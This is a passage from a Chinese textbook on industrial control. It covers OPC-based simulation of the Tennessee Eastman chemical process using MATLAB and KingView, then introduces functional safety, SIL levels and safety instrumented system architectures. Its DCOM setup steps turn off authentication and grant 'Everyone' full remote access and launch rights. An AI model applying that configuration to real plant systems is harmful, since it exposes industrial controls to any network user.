(2)定义了一个生存期保持(keep-alive)的间隔,服务器周期性地发出生存期保持的消息,客户端可以及时检测到服务器和通信的状态。 (3)传输的消息都有序列号,客户端程序就可以根据序列号检测数据是否丢失,如果丢失,可以根据序列号重传。 (4)为服务器和客户端设计了冗余机制。 6.8 OPC规范在TE过程模拟仿真与控制中的应用 6.8.1 TE过程模拟仿真与控制系统总体结构 1. TE过程介绍 1)TE过程简介 在1976年和1981年的第一和第二届关于化工过程控制的工程基金会议(Engineering Foundation Conference on Chemical Process Control)上,过程控制学术界表达了希望能有一个评价过程控制、优化和监控方法的现实的工业过程。随后Shell公司在1986年提出了一个测试问题。1990年在AIChE发起的基于工业过程的测试问题的会议上,伊斯曼化学品公司(Eastman)的Downs和Vogel提出了著名的Tennessee-Eastman Problem。虽然为了保护知识产权,两位作者修改了组分、反应动力学及操作条件等参数,但是TE问题仍然深深地植根于现实的工业过程,不失为一个很好的检验各种过程控制技术的好问题。许多学者、研究员等对这个案例的过程控制进行了深入广泛的研究并给出了相应的控制策略,其应用领域已经从常规的过程控制扩展到多变量控制、模型预测控制、故障诊断、非线性控制等众多领域。 TE过程主要有4种气态反应物参与过程反应,分别是A、C、D以及E。生成物主要有G和H,还有一种副产物F。除此之外,在产物的进料中还会伴有少许的惰性气体B。TE过程主要包含下列4种反应: A(g) + C(g) +D(g) → G (g) A(g) + C(g) +E(g) → H (g) A(g)+E(g) → F(liq) 3D(g) → 2F(liq) 上面4种反应都是不可逆的放热反应。反应速率受温度影响。反应速度是温度的Arrhenius函数,其中生成G的反应比生成H的反应有更高的活化能,导致对温度具有更高的灵敏度。生成产物G时,反应速率对温度是非常灵敏的。就反应物浓度而言,这个反应可以被近似看作是一阶反应。 TE模型包含22个连续变量(如表6.6所示),19个非连续测量组分变量(如表6.7所示),以及12个操纵变量(如表6.8所示)。整个过程的动态模型由5个操作单元的动态模型组成,每一单元都依据物料平衡、能量平衡、气液相平衡规律等建立相应的微分方程组。该模型共有30个微分方程,148个代数方程。 表6.6 TE过程连续变量 表6.7 成分测量变量一览表 表6.8 过程操纵变量 2)TE过程工艺与控制 TE过程设备主要由反应器、气液分离器、汽提塔、循环压缩机及产品冷凝器5个设备组成。气态反应物进入反应器中反应生成液态产物,这个反应是在一种不挥发的催化剂作用下进行的。反应器通过冷凝水降温,移除反应产生的能量。出来的产物是气态的,同时还混合有未反应物。 TE过程的工艺流程图如图6.18所示。 反应器的产品流通过冷凝器冷却,然后送入到气液分离器。从分离器出来的蒸汽通过压缩机再循环送入反应器。为了防止过程中惰性组分和反应副产品的积聚,必须排放一部分再循环流。来自分离器的冷凝成分(流10)被泵送到汽提塔。流4用于汽提流10中的剩余反应物,这些剩余反应物通过流5与再循环流结合。从汽提塔底部出来的产品G和H被送到下游过程。气态副产物与惰性气体主要通过放空进行移除。 根据G/H质量比不同,TE过程有6种操作模式。其中模式1(G/H=50/50)称为基准操作。不同的G/H比率主要根据对产品的要求而定,而这通常又取决于市场的需求以及厂能的制约。本节仿真是针对模式1进行的。 TE过程的控制目标是: (1)要使过程变量值保持在设定要求的范围之内。 (2)在不超出设备限度之下,确保操作条件稳定。 (3)当扰动存在时,尽可能保证产品比率与产品质量变化很小。 (4)影响其他过程量的变化要尽量控制在最小。 (5)当产品比率变化与混合产品的组分配比变化时,能够平稳迅速从扰动中恢复。 图6.18 TE工艺流程 2. 模拟仿真系统总体结构 模拟仿真技术在工业控制等行业得到广泛应用。不同行业有不同的仿真工具,如化工过程流程模拟软件有Aspen Hysys和Aspen Plus等软件。MATLAB作为通用的仿真软件在各个行业都得到广泛使用。就仿真方案而言,可以有实物仿真、虚拟仿真和混合仿真方式。本节对于TE过程的模拟仿真,可以采用如图6.19所示的模拟仿真方案,其中图(a)是纯软件仿真,即TE过程和控制的仿真都用MATLAB,而人机界面则用组态软件,在该方案中,MATLAB是作为OPC客户程序,而人机界面是作为OPC服务器的;图(b)是属于控制器硬件在环的模拟仿真方案,在这种方案中,可以用PLC或其他硬件作为控制器,而MATLAB只作为TE过程的仿真工具。这里人机界面和MATLAB都是作为OPC客户程序的,而OPC服务器是硬件厂家自带的或专门购买的第三方产品。当然,也可以增加一个MATLAB与人机界面的OPC通信的通道,人机界面可以直接从MATLAB获取过程仿真的测量值等参数,这时,组态王是OPC服务器,MATLAB是OPC客户端。可见看出,无论哪种方案,都需要用到OPC通信,从而可见OPC规范在模拟仿真系统中的重要性。 图6.19 TE过程模拟仿真与控制方案 本节采用如图6.19(a)所示的方案,其实现过程如下:首先在MATLAB的Simulink仿真环境下建立TE模型,然后利用组态王软件开发模拟仿真系统的人机界面。建立TEprocess工程,工程包括TE过程、反应器、分离器、汽提塔的组态监控画面,以及实时数据库组态和报警组态等,从而实现对TE过程的人机监控。在组态王的监控画面上显示TE过程参数(温度、压力和流量等)的实时值、PID参数及被控变量的设定值等。其中过程参数来自于MATLAB仿真的结果。操作人员可以在人机界面中修改PID参数值和设定值等。这些参数会通过OPC通信送入MATLAB仿真模型中,从而影响模型仿真结果,以达到对过程控制的目的。在Simulink中是通过OPC read、OPC write来实现数据的读和写操作的。 6.8.2 基于OPC规范的TE过程模拟仿真与控制系统实现 1. DCOM配置 在进行OPC通信之前,需要对安装OPC服务器和客户程序的电脑进行DCOM配置。具体配置步骤如下: (1)在Windows 7系统中,单击“开始”,并输入“dcomcnfg”,按下回车键,弹出“组件服务”对话框。 (2)右击计算机目录下的“我的电脑”,选择“属性”,弹出“我的电脑 属性”对话框。进入“默认属性”页,勾选“在此计算机上启用分布式COM(E)”。“默认身份验证级别(U)”选择“无”,“默认模拟级别”选择“标识”。 (3)进入COM安全属性页进行设置:单击“编辑限制(L)”,弹出“访问权限”对话框,添加“Everyone”组或用户名,并将Everyone的“本地访问”权限、远程访问权限设置为“允许”;单击“编辑默认值(E)”,弹出“访问权限”对话框,添加“Everyone”组或用户名,并将Everyone的“本地访问”权限、远程访问权限设置为“允许”;单击“编辑限制”,弹出“启动和激活权限”对话框,添加“Everyone”组或用户名,并把Everyone的权限(P):本地启动、远程启动、本地激活、远程激活都设置为允许;单击编辑默认值(D),弹出“启动和激活权限”对话框,添加“Everyone”组或用户名,并把Everyone的权限(P):本地启动、远程启动、本地激活、远程激活都设置为允许。 (4)在组件服务对话框中,展开我的电脑—DCOM,找到OpcEnum,右击,选择属性—安全对话框,将“启动和激活权限”、“访问权限”勾选为“使用默认值”。将“配置权限”勾选为“自定义”,再单击编辑,弹出“更改配置权限”对话框。添加“Everyone”组或者用户名,并将“Everyone的权限”:完全控制、读取设置为允许。单击“确定”,关闭对话框。 (5)在组件服务对话框中,展开我的电脑—DCOM,找到KingView.View,右击选择属性,弹出“KingView.View 属性”对话框。选择安全,将“启动和激活权限”、“访问权限”勾选为“使用默认值”,将“配置权限”勾选为“自定义”,再单击“编辑”,弹出“更改配置权限”对话框。添加“Everyone”组或者用户名,并将“Everyone的权限”:完全控制、读取设置为允许。在“KingView.View属性”对话框中,选择“标识”,勾选“交互式用户”。单击“确定”,关闭所有对话框,配置完成。 2. MATLAB与组态王通信设置 本模拟仿真中,MATLAB作为客户端,组态王作为OPC服务器。MATLAB通过Simulink中的OPCread获取组态王中的设定值、控制器PID规律的参数,然后在Simulink仿真运算时再通过OPCwrite把被控对象测量值输出至组态王变量中。为了实现两者通信,需要进行一定的设置,具体如下: 双击MATLAB7.8.0 (R2009a),单击左下角的“Start”,接着单击Toolboxes,然后单击more,再单击OPC,最后单击OPCtool (opctool)。在弹出的OPC tool窗口中,右击左边的OPC Network,选择add host,如果默认是local host,则单击“确定”。右击出现的KingView.View.1,选择Create Client。在组态王画面建好并切换到View(运行环境)的情况下,右击OPC tool画面中的localhost/KingView.View.1,选择connect。如果能连接成功,则说明MATLAB与组态王基于OPC通信设置成功,如图6.20所示。 这样设置后,依旧在Simulink里面添加OPC Configuration,并进行配置。这样的好处在于可以确保OPC通信成功。 图6.20 建立组态王与MATLAB的OPC通信 3. TE过程模拟仿真 参考网络上的TE模型程序,首先在Simulink里面建立TE过程模型,模型如图6.21、图6.22和图6.23所示。 图6.21 TE过程模型 图6.21显示的是TE模型的主系统。由于TE模型比较复杂,在一个Simulink 模型里面不容易实现,因此将图6.21中间部分放在另外一个模型里面形成子系统(subsystem)。 图6.22是子系统详细图,左边是操纵变量输入,中间加了扰动,TEcode是TE模型机理的实现,是通过C语言编写的,右边是输出。TE模型实际上有41个测量值输出,这里根据需要通过“selector”选择其中的20个测量值输出。 图6.23是TE模型的控制回路,可以看出,这里有很多个控制回路。以反应器温度控制为例,反应器温度设定值9和反应器温度测量值xmeas9输入到PID控制模块中,经过运算后输出一个控制变量xmv10来控制反应器冷却水流量。 为了TE过程仿真与控制的数据和上位机人机界面通信,在TE过程模型里加上OPC Configuration、OPC read(图6.21中)、OPC write,如图6.24所示。OPC配置(OPC Configuration)过程是:双击OPC配置函数块后,单击Configure OPC Client,然后单击Add,再单击select,选择KingView.View.1,最后关闭OPC Configuration配置窗口。对于OPC read,双击该函数块后,先单击Configure OPC Client,配置同OPC Configuration,然后单击Add Items,在Enter Item ID(s)下面输入想要读取的变量名称,以TE过程模型中的分离器液位设定值为例,其输入形式为“slsp.Value”。“slsp”是组态王里面定义的分离器液位设定值变量名字,“.Value”表示该变量对象的值属性,如图6.25(a)所示。对于OPC write,双击该函数块后,先单击Configure OPC Client,配置同OPC Configuration;然后,单击Add Items,配置数据项,如图6-25(b)所示。 图6.22 TE过程模型(subsystem) 图6.23 TE过程模型(subsystem 控制部分) TE模型当中,通过OPC write输出给组态王变量的数据包括工艺参数和仿真得到的操纵变量,包括:反应器压力、反应器温度、气液分离器液位、气液分离器压力、汽提塔压力、压缩机功率、反应器冷却水出口温度、物料A流量、物料D流量、物料E流量等,如图6.24所示。除此之外,通过OPC read 从组态王读取过来的数据有:被控变量的设定值,如分离器液位设定值,以及每个控制回路的P、I、D参数设定值等参数。 图6.24 TE过程模型(加上OPC块) 图6.25 MATLAB中OPC 读、写配置 4. 模拟仿真系统人机界面设计与运行 打开组态王软件,打开工程管理器,新建工程TEprocess。在该工程下,打开数据词典。双击“新建”,定义变量“ti、ts、kc、strpsp、sp”分别为:反应器温度、分离器液位、汽提塔压力、压缩机功率、反应器冷却水出口温度、反应器液位、反应器压力、反应器温度设定值、反应器压力设定值、分离器液位设定值、手自动切换、反应器控制积分时间、反应器控制微分时间、反应器控制比例增益、汽提塔压力设定值、气液分离器压力,如图6.26所示。需要注意的是,这些变量都是内部变量。 图6.26 组态王中定义的部分变量 其次,在组态王中依次新建组态画面:TEprocesswhole、TEprocess、TEreactor、TEseparator、TEstripper、报警窗口。根据需要设置这些画面的大小、颜色等属性。组态画面新建完成并且全部保存之后,切换到View状态。其中,TEprocesswhole是总的组态画面,TEprocess、TEreactor、TEseparator和TEstripper分别对应几个流程中的设备细节,报警窗口用于显示报警。TEprocesswhole组态画面中设置5个按钮,以从主监控画面切换到对应的5个组态画面。以TEreactor按钮为例,其组态过程是:双击该按钮,在命令语言连接选项下单击时弹起,然后单击全部函数,选择ShowPicture("")函数,并插入名称为TEreactor的画面。其他按钮组态过程也是采用同样的方法。组态完成后,保存所有的画面,切换到View后检查人机界面功能。可以单击每个按钮看画面切换是否正常。在TEprocesswhole 组态画面中单击TEprocess按钮后,得到图6.27所示的界面。 图6.27 TEprocess组态画面 在TEprocess监控画面中,可以看到该TE过程的工艺参数实时数值,这些数组就是在MATLAB中利用OPC write指令传输过来的,见图6.24中的相应指令。 单击TEreactor按钮后,出现如图6.28所示的人机界面,该界面显示了反应器监控的详细情况,包括工艺参数和温度以及压力控制回路信息。 图6.28 TEreactor 组态画面 第7章 工业控制系统功能安全与信息安全 7.1 功能安全与安全仪表系统 7.1.1 功能安全相关知识 1. 安全功能与功能安全 据统计,在全球由于安全保障系统的缺失或者不完善而引发事故造成大量伤亡,其中每年死于工伤事故和职业病危害的人数约为200万,是人类最严重的死因之一,这也引起了各个行业及各国政府对功能安全的高度重视。 通过各种安全功能(Safety Function)来降低风险,减少生命财产损失是非常必要的。目前,这种安全功能在各种行业都得到了广泛的应用,对于保证生命财产安全起到了很重要的作用。基于安全功能在众多领域广泛使用,因此,相应的国际组织开展了有关的标准化工作。作为最主要的功能安全国际标准IEC61508,把安全功能定义为:为了应对特定的危险事件(如灾难性的可燃性气体释放),由电气、电子、可编程电子安全相关系统,其他技术安全相关系统,或外部风险降低措施实施的功能。为了实现合理有效的安全功能,就非常有必要了解功能安全。 根据IEC61508标准,功能安全的定义是:与被控设备(Equipment Under Control,EUC)和EUC控制系统有关的、整体安全的一部分,取决于电气、电子、可编程电子安全相关系统,其他技术安全相关系统和外部风险降低措施机制的正确执行。 由此可见,功能安全是包括安全仪表系统在内的安全子系统是否能有效地执行其安全功能的体现。通俗地理解,就是当出现安全风险,需要安全仪表系统、其他安全相关系统和外部风险降低措施执行安全功能时,它们是否由于故障或其他原因而不能正确执行期望的安全功能,不能实现预期的风险降低,并且这种不能正常工作的可能性有多大。 功能安全是一种基于风险的安全技术和管理模式。风险评估是实施功能安全管理的前提,安全完整性等级(Safety Integrity Level,SIL)是功能安全技术的体现,安全生命周期是功能安全管理的方法。因此,风险评估、安全完整性等级和安全生命周期是IEC61508的精髓。 2. 功能安全标准 1996年美国仪器仪表协会完成了第一个关于过程工业安全仪表系统的标准ANSL/ ISA-S84.01。随后,国际电工委员会于2000年出台了功能安全国际标准IEC61508:电气/电子/可编程电子(E/E/PE)安全相关系统的功能安全。该标准是功能安全的通用标准,是其它行业制订功能安全标准的基础。2003年,IEC发布了适用于石油、化工等过程工业的标准IEC61511。随即,美国用IEC61511取代了ANSI/ISA-S84.01成为国家标准。IEC61508标准发布之后,适用于其他行业的功能安全标准相继出台,例如,核工业的IEC61513标准,机械工业的IEC62021标准等。我国已于2006年、2007年分别等同采用了IEC61508标准和IEC61511标准,发布了GB/T20438和GB/T21109两个国家推荐功能安全标准。 3. 风险评估与风险降低 1)风险 根据IEC61508中的定义,危险是导致人们生命财产安全以及环境受到损害的主要潜在因素,这种损害或者是化学的,或是物理的。而风险被定义为两个方面的组合,一方面是指造成伤害的概率,另一方面是指该伤害的严重度。根据定义,风险可以表示成下式: IEC61508中定义了四种类型的风险:过程风险、允许风险、残余风险和必要的风险降低。具体含义如下。 过程风险:由于设备、基本过程控制系统(BPCS)和有关人为因素的特定危险事件中所存在的风险,在确定这一风险时,暂不考虑想采用的安全防护措施。 允许风险(过程安全目标水平):根据当今社会、国家、地方的法规、经济、道德、环境等多方面因素,在给定的环境内能够接受的风险。 残余风险:在使用了外部风险降低措施、E/E/PE安全相关系统和其他技术相关系统后,仍存在的过程风险。 必要的风险降低:即通过风险降低措施所必须达到的风险降低水平,从而使得系统风险降低到可接受的程度。 2)风险评估 风险评估是对生产过程中的风险进行识别、评估和处理的系统过程。风险评估包括对在危险分析中可能出现的危险事件的风险程度进行分级。风险评估的主要目的是:建立一个风险界定的标准,划分风险的来源及影响范围,决定风险是否可以容忍,若不能容忍,应采取怎样的措施来降低风险,并确定这些措施是否适用。风险的评估技术有:风险图法;失效模式、影响和危害度分析(FMECA);失效模式和影响分析(FMEA);故障树分析(FTA)和危险与可操作性分析(HAZOP)等。其中,HAZOP(HAZard and OPerability)技术的应用较为广泛和成熟,它是一种结构化和系统化地检查被定义系统的技术。 3)风险降低 风险降低包括3个部分:E/E/PE安全相关系统、外部风险降低设施和其他技术安全相关系统,如图7.1所示。可见,对于整个安全手段来讲,E/E/PE安全相关系统只是其中一部分,必须结合其他风险降低措施把受控装置的风险降低到可容忍的风险以下。即通过实际的风险降低后,使得残余风险进一步降低。通常,风险评估得到的结果用于确定安全系统所需要达到的安全完整性等级,再将整体安全完整性等级分配到不同的安全措施中,使系统的风险降低到允许的水平。 由于无论从技术上还是投资或运行成本上完全避免风险事件的发生是不可行的,也是不必要的。因此,需要通过分析风险的大小,依据ALARP(As Low As Reasonably Practicable)原理,即按照合理的、可操作的、最低限度的风险接受原则,确定可接受的风险水平和风险降低措施。 上述风险降低的手段,在实际的工程设计中有一定的对应。 例如,在工艺和设备设计时,根据生产流程中物料的物理和化学性质,采用合适的设备和管道材质;对高温操作,设计适宜的隔热措施;对高压要求,选择适当的设备结构、材质和壁厚;对储存或加工危险物料的容器或设备,降低处理量或者加大设备间距。这种从工艺设计本身消除风险的措施,被称为固有安全(Inherent Safety)。 图7.1 风险降低指标的关系 对绝大多数工艺装置或单元来说,固有安全设计是不能降低整体风险要求的,还必须采取其他的安全措施,比如在高压反应器上设置安全阀,在反应压力超高时,保护设备不受损坏。这种在危险发生之前,使其转危为安的防护方法,称为主动保护(Active Protection)。 在有些场合,比如油罐的罐区,为了防止油品溢出或泄漏导致火灾或污染周围环境,会设置围堰、防护堤等措施。这种防护并没有阻止危险事件的发生,它只是在泄漏或火灾发生时,使其限制在一定范围内。这种措施称为被动保护(Passive Protection )。 上述主动或被动保护属于图7.1风险降低中的外部风险降低设备。而常用的紧急停车系统(ESD)、燃烧管理系统(BMS)、透平压缩机控制系统(ITCC)等主动保护属于“E/E/PE安全相关系统”。 上述各种风险降低机制,可以归结到IEC61511-3中给出的典型风险降低机制,如图7.2所示。可以看出,通过采用不同层次、不同措施实现工艺过程的“必要风险降低”,可最终达到“可接受风险”的目标。这些不同的层次和措施,因其相互的独立(或者说,必须保证各自的独立性),也被称为独立保护层,因此,图7.2也常称为保护层模型,该模型中各保护层的概念含义如下: (1)“工艺过程”层在设计中要注重本质安全或固有安全设计。通过工艺技术、设计方法、操作规程等有效地消除或降低过程风险,避免危险事件的发生。 (2)“工艺控制/报警”层由基本过程控制系统和报警系统组成。关注的焦点是将过程参数控制在正常的操作设定值附近。 (3)“重要报警及人员干预/调整”是生产发生异常时,操作人员可以改变控制参数和方式,力图使生产恢复到正常状态。该功能实际上仍然属于第2层。 (4)“安全仪表系统”的作用是降低危险事件发生的频率,保持或达到过程的安全状态。常见的紧急停车系统即属于该层。 (5)“释放设备”的作用是减轻和抑制危险事件的后果,即降低危险事件的烈度。如泄压阀等机械保护系统即属于该层。 (6)“物理保护”层的设计目的也是减轻或抑制危险事件的后果。 (7)“应急响应”层包括医疗、人员紧急撤离、工厂周边居民的撤离等。 图7.2 过程工业典型风险降低机制 4. 安全完整性等级 安全完整性等级也称为安全完整性水平。IEC61508国际标准定义了SIL的概念:在一定时间、一定条件下,安全相关系统执行其所规定的安全功能的可能性。为了降低风险以及危险事件发生的频率,要对安全仪表系统确定安全完整性等级,只有达到了指定的安全完整性等级,才能够满足生产过程的安全要求,从而将风险降低到可以容忍的水平。 安全完整性等级包括两个方面的内容: (1)硬件安全完整性等级,这里的安全完整性等级由相应危险失效模式下硬件随机失效决定,应用相应的计算规则,对安全仪表系统各部分设备的安全完整性等级进行定量计算,概率运算规则也可以应用于此过程中,如确定子系统与整体的关系。 (2)系统安全完整性等级,此处的安全完整性等级由相应危险失效模式下系统失效决定。系统失效与硬件失效不同,往往在设计之初就已经出现,难以避免。通常失效统计数据不容易获得,即使系统引发的失效率可以估算,也难以推测失效分布。 IEC61508将SIL分为4个等级:SIL1~SIL4,其中SIL1是最低的安全完整性水平,SIL4是最高的安全完整性水平。SIL等级的确定是通过计算系统的平均要求时失效概率PFDavg来实现的。不同的失效概率对应着不同的SIL等级,SIL等级越高,失效概率越小。所谓时失效概率,是发生危险事件时安全仪表系统没有执行安全功能的概率;而平均时失效概率是指在整个安全生命周期内的危险失效概率。 IEC61511将安全仪表功能的操作模式分为:“要求操作模式”(Demand Mode of Operation)和“连续操作模式”(Continuous Mode of Operatioon)。对于要求操作模式和连续操作模式下的失效概率如表7.1所示。要求操作模式有时也称为低要求操作模式,而连续操作模式也称为高要求操作模式。 表7.1 两种模式的SIL等级划分 对于SIL的定性描述如表7.2所示。对安全仪表系统来说,因安全仪表系统自身失效导致的后果是决定安全仪表系统SIL的主要因素之一。 表7.2 SIL的定性描述 安全完整性等级的确定是在基于风险评估结果的基础上进行的,不合理的风险评估技术会导致安全相关系统安全完整性等级的过高或过低。安全完整性等级过高会造成不必要的浪费,而过低则会因为不能满足安全要求而导致出现不可接受的风险。 安全完整性等级的选择方法有定性和定量的两类。目前常用的定性方法有:风险矩阵法和风险图;基于频率的定量法,如故障树、LOPA、事件树、根据频率定量计算法。硬件安全完整性的安全功能声明的最高安全完整性等级,受限于硬件的故障裕度和执行安全功能的子系统的安全失效分数。子系统可以分成A类和B类,A类表示所有组成元器件的失效模式都被很好地定义了;并且故障情况下子系统的行为能够完全地确定;并且通过现场经验获得充足的可靠数据,可现实满足所声明的检测到的和没有检测到危险失效的失效率。B类中至少有一个组成部件的失效模式未被很好地定义;或故障情况下子系统的行为不能被完全地确定;或通过现场经验获得的可靠数据不够充分,不足以显示出满足所声明到的和未检测到的危险失效的失效率。 7.1.2 安全仪表系统 1. 安全仪表系统概念 安全仪表系统(Safety Instrument System,SIS)由传感器、逻辑控制器和执行器3部分构成,用于当预定的过程条件或状态出现背离时,将过程置于安全状态。例如系统超压或高温,安全仪表系统可以实现压力的降低、温度的降低,从而把处于危险状态的系统转入安全状态,保障设备、环境及生产人员安全。IEC61511将安全仪表系统定义为执行一个或多个安全仪表功能的仪表系统。所谓安全仪表功能是指由SIS执行的、具有特定安全完整性等级的安全功能,用于对特定的危险事件,达到或保持过程的安全状态。 安全仪表系统中,传感器用来检测生产过程中的某些参数,而逻辑控制器对传感器采集来的参数进行分析,如果达到了构成危险的条件,由最终执行元件进行相应的安全操作,进而保障整个生产过程的安全。安全仪表系统是一个自动化的系统,其典型的结构框图如图7.3所示。 图7.3 典型安全仪表系统结构框图 图7.4是一个液体满溢保护系统,其中图(a)是没有设置满溢保护装置的系统,图(b)是设有满溢保护装置的系统。图(b)的满溢保护系统可以防止由于水箱水满而使液体流出水箱而散布到环境中。这个系统由一个电子振动的水平测量装置(液位传感器)、可编程逻辑控制器或基于分布式控制系统的逻辑控制器以及一个管道关闭阀组成。 液体满溢保护系统的工作流程描述为:图(a)装置当水箱水满时没有任何保护措施,液体将会流出水箱到环境中去,如果是有毒有害的液体将会对周围环境以及工作人员带来危害;对于图(b)来说,当水箱液体达到一定的液位以后,图中B1液位传感器就会把采集到的液位信号通过B2这个开关放大器将信号传送给逻辑控制器,逻辑控制器就会根据事先预定的联锁功能来关闭阀门B4,停止向水箱进水,这样就保证了水箱的液体不会溢出到环境中,起到了安全防护的作用。 图7.4 水箱满溢保护系统 (B1)—液位传感器;(B2)—电源供应和开关放大器;(B3)—逻辑控制器(PLC或DCS);(B4)—关闭阀。 2. 安全仪表系统分类 安全仪表系统按照其应用行业的不同可以划分为化工安全仪表、电力工业安全仪表、汽车安全仪表、矿业安全仪表和医疗安全仪表等。在每个行业中又可以进行更进一步的细分,例如矿业又可以分为煤矿、金属矿、非金属矿及放射性矿等。此外还可以根据安全仪表系统实现的功能来分类,如可燃、有毒气体监测系统、紧急停车系统、移动危化品源跟踪监测系统以及自动消防系统等。 在IEC61508标准出来以前,在油气开采运输、石油化工和发电等过程工业,就有紧急停车系统(Emergency Shut Down System,ESD)、火灾和气体安全系统(Fire and Gas Safety System,FGS)、燃烧管理系统(Burner Management System,BMS)和高完整性压力保护系统(High Integrity Pressure Protection System,HIPPS)等。目前,这些都归并到安全仪表系统概念中。 如果按照安全仪表系统的逻辑结构划分,安全仪表系统又可以分为1oo1、1oo2、2oo3、1oo1D和2oo4等。其中,MooN是M out of N(N选M)的缩写,代表N条通道的安全仪表系统当中有M条通道正常工作;字母D是代表检测部分,是带有诊断电路检测模块的逻辑结构。MooN表决的含义是基于“安全”的观点,“N-M”的差值代表了对危险失效的容错能力,即硬件故障裕度(Hardware Fault Tolerance,HFT)。硬件故障裕度N意味着N+1个故障会导致全功能的丧失。例如,1oo2表决的意思是两个通道中的一个健康操作,就能完成所要求的安全功能,其HFT为1,而容错(Spurious Fault Tolerance,SFT)为0。 根据安全完整性等级的不同,安全仪表系统又分为SIL1、SIL2、SIL3和SIL4等不同等级。目前安全仪表系统的发展多样化,不同应用领域有着不同的类型,但其实现的功能都是统一的,都是为了保障安全生产而设定的,它们的设计、生产等相关过程都遵循国际标准。 3. 安全仪表系统的逻辑结构 1)1oo1结构 该结构包括一个单通道(传感、输出、公共),如图7.5所示。这里的公共电路可以是安全继电器、固态逻辑器件或现代的安全PLC等逻辑控制器。该系统是一个最小系统,这个系统没有提供冗余,也没有失效模式保护,没有容错能力,电子电路可以安全失效(输出断电,回路开路) 或者危险失效(输出粘连或给电,回路短路),而危险失效都会导致安全功能失效。 图7.5 1oo1物理结构图 2)1oo2结构 图7.6为1oo2的物理结构图,该结构将两个通道输出触点串联在一起。正常工作时,两个输出触点都是闭合的,输出回路带电。但输入存在“0”信号时,两个输出触点断开,输出回路失电,确保安全功能的实现。 图7.6 1oo2物理结构图 其失效模式分析如下: (1)当任意一个输出触点出现开路故障,输出电路失电,都造成工艺过程的误停车。也就是说,只有2个输出触点都正常工作才能避免整个系统的安全失效。因此,这种结构的可用性较低(SFT=0)。 (2)当任意一个输出触点出现短路故障时,不会影响系统的正常安全功能实现。只有当两个触点都出现短路故障时,才会造成系统的安全功能丧失,即导致系统的危险失效。因此,这种结构系统的安全性有提高(HFT=1)。 3)2oo2结构 图7.7所示为2oo2结构,此结构由并联的两个通道构成,系统正常运行时,两个回路输出都是闭合的。当存在安全故障时,两个回路都断开,输出失电。 图7.7 2oo2物理结构图 这种双通道系统的失效模式和影响分析如下: (1)当任意一个输出触点出现开路故障时,不会造成输出电路失电,只有当两个触点同时存在开路故障时,才会造成工艺过程误停车。即只要两个输出触点中的一个正常工作,就能避免危险失效。 (2)当任意一个输出触点出现短路故障时,将会导致危险失效,使得系统安全功能丧失。该结构降低了系统安全性(HFT=0),但提高了过程可用性(SFT=1)。 4)2oo3结构 图7.8为2oo3结构的物理框图,此结构由3个并联通道构成,其输出信号具有多数表决安排,仅其中一个通道的输出状态与其他两个通道的输出状态不同,不会改变系统的输出状态。任意两个通道发生危险失效就会导致系统危险失效;任意两个通道发生安全失效将导致系统安全失效。采用上述冗余结构可以提高安全仪表系统的硬件故障裕度。 图7.8 2oo3物理结构图 采用冗余方法提高系统的SIL等级时,必须考虑共同原因失效问题,也就是说,必须尽力防止一个故障导致几个冗余通道同时失效的问题。这也是用“硬件故障裕度”来评价产品的SIL等级而不是直接用冗余数的原因。一些公司在他们的安全产品中采用3个不同厂家生产的微处理器来构成3个冗余通道,其目的就是为了避免共因失效,提高产品的容错能力与安全性能。 5)1oo1D结构 这种结构由两个通道组成,但其中一个通道为诊断通道。典型的 1oo1D 结构如图7.9所示。诊断通道的输出与逻辑运算通道的输出串联在一起,当检测到系统内的危险故障存在时,诊断电路的输出可以切断系统的最终输出,使工艺过程处于安全状态。 图7.9 1oo1D物理结构图 这种一选一诊断系统功能相当于一种二选一系统。因为这种系统的造价相对低廉,所以在安全应用中被广泛使用。其结构通常由一个单一逻辑解算器和一个外部的监视时钟而构成,定时器的输出与逻辑解算器的输出进行串联接线。 4. 安全仪表系统与基本过程控制系统(BPCS) 基本过程控制系统是执行基本的生产控制要求,完成基本功能,如采用PID控制规律的自动控制系统。常用的DCS或PLC控制系统、SCADA系统等也都属于常规控制系统。与安全仪表系统不同的是,基本过程控制系统BPCS只执行基本控制功能,其关注的是生产过程能否正常运行,而不是生产过程的安全。一般过程控制系统采用反馈控制的形式,对生产过程,即物质和能量在生产装置中相互转换的过程进行控制。基本过程控制系统就是通过对温度、压力、液位和流量等参量的调节,达到提高生产产量和质量,降低副产物,减少能量消耗的目的。 基本过程控制系统与安全仪表系统一般要做到相互独立,二者执行的功能不同,不可相互混淆。安全仪表系统监视整个生产过程的状态,当发生危险时动作,使生产过程进入安全状态,降低风险,防止危险事件的发生。 图7.10为一个反应器设置的过程控制系统和安全仪表系统构成图。从图中可以看出,该反应器生产过程配置了基本过程控制系统与安全仪表系统,且两个系统配置独立,运行独立。当然,在实际的工业现场,有时安全仪表系统会和常规控制系统通信,在常规控制系统的操作员站上可以观察到安全仪表系统运行状态,但不能对其施加控制。 图7.10 基本过程控制系统与安全仪表系统 与常规控制系统相比,安全仪表系统的特点主要体现在以下几点: (1)符合一定的安全完整性水平。安全仪表系统的设计和开发过程必须遵循IEC61508标准,投入使用的安全仪表系统必须满足要求的安全完整性水平。 (2)容错性的多重冗余系统。为了提高系统的硬件故障裕度,安全仪表系统一般都采用多重的冗余结构,使系统的安全功能不会因为单一故障而丧失。 (3)响应速度快。SIS具有较好的实时性,从输入变化到输出变化的响应时间一般都在10~50ms左右,甚至有些小型的SIS都可以达到几毫秒的响应速度。 (4)全面的故障自诊断能力。安全仪表系统在设计和开发时考虑了避免失效和系统故障控制的要求,系统的各个部件都应明确其故障诊断能力,在其失效后能及时采取相应措施,系统的整体诊断覆盖率一般高达90%以上。安全仪表系统的硬件具有高度的可靠性,能承受各种环境应力,可以较好地应用到不同的工业环境中。 例如,对于DCS或PLC而言,通常一个开关量输入DI信号是直接被用于程序逻辑运算。但安全仪表中(以黑马F35机器级安全仪表为例),在使用该DI信号前,要把该信号与系统自检的结果进行联合判断,联合判断的结果作为该DI信号参与程序逻辑的值。如果系统自检发现安全仪表出现故障,则不论DI信号是“1”还是“0”,联合判断的结果是“0”,从而使安全仪表系统输出“0”(安全仪表设计的原则是只要出现故障就失电)。虽然这会造成系统的可用性降低,但避免了危险失效。 (5)事件顺序记录功能。安全仪表系统一般都具有事件顺序记录(Sequence Of Events,SOE)功能,即可按时间顺序记录故障发生的时间和事件类型,方便事后分析,记录精度一般可以精确到毫秒级。 5. 安全仪表系统的安全性与可用性 1)安全性 